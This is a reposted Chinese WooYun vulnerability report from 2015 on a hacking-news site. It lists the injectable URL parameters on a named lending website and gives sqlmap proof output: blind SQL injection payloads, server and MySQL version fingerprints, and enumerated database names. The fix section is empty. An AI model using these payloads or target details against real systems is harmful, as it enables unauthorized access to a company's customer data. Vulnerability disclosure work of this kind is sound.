记录黑客技术中优秀的内容, 传播黑客文化,分享黑客技术精华

厦门天天易贷网存在多处SQL注入漏洞

2015-05-23 08:15

http://www.ed12345.com/product_detail.php?id=565 id注入

http://www.ed12345.com/news_list.php?class_id=50 class_id注入

http://www.ed12345.com/home.php?id=203 id注入

http://www.ed12345.com/product_detail2.php?member_id=203&id=629 member_id和id都有注入



其他位置应该也有注入 请自行排查

漏洞证明:

code 区域
Place: GET

Parameter: id

Type: boolean-based blind

Title: AND boolean-based blind - WHERE or HAVING clause

Payload: id=565 AND 2492=2492



Type: AND/OR time-based blind

Title: MySQL > 5.0.11 AND time-based blind

Payload: id=565 AND SLEEP(5)

---

[18:33:56] [INFO] the back-end DBMS is MySQL

web server operating system: Windows 2003 or XP

web application technology: Microsoft IIS 6.0, ASP.NET, PHP 5.2.17

back-end DBMS: MySQL 5.0.11

[18:33:56] [INFO] fetching database names

[18:33:56] [INFO] fetching number of databases

[18:33:56] [WARNING] running in a single-thread mode. Please consider usage of option '--threads' for faster data retrieval

[18:33:56] [INFO] retrieved: 2

[18:33:59] [INFO] retrieved: information_schema

[18:34:48] [INFO] retrieved: daikuan

available databases [2]:

[*] daikuan

[*] information_schema

修复方案:

知识来源: www.wooyun.org/bugs/wooyun-2015-0106453

阅读:82699 | 评论:0 | 标签:注入 漏洞

想收藏或者和大家分享这篇好文章→复制链接地址

“厦门天天易贷网存在多处SQL注入漏洞”共有0条留言

发表评论

姓名:

邮箱:

网址:

验证码:

公告

关注公众号hackdig,学习最新黑客技术

推广

工具

标签云